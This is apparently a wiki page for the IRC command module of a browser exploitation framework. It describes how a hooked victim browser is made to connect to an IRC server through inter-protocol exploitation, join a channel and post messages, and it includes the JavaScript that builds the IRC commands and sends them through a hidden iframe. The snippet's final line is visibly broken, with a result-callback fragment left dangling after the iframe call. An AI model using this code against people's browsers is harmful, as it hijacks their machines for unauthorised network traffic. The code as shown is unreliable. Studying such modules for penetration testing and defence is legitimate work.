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Module: IRC

Haoxi Tan edited this page Jan 10, 2020 · 2 revisions


  • Objective: Communicate with IRC server through a hooked browser

  • Authors: jgaliana

  • Browsers: Firefox

  • Code

Internal Working

Using Inter-protocol Exploitation/Communication (IPEC) the hooked browser will connect to an IRC server, join a channel and send messages to it.

NOTE: Some IRC servers (like freenode) have implemented protections against connections from a web browser. This module is unlikely to work in those instances.

var irc_commands = "NICK " + nick + "\n";
irc_commands    += "USER " + nick + " 8 * : " + nick + " user\n";
irc_commands    += "JOIN " + channel + "\n";
irc_commands    += "PRIVMSG " + channel + " :" + message + "\nQUIT\n";

// send commands
var irc_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", irc_commands);"<%= @command_url %>", <%= @command_id %>, "result=IRC command sent");


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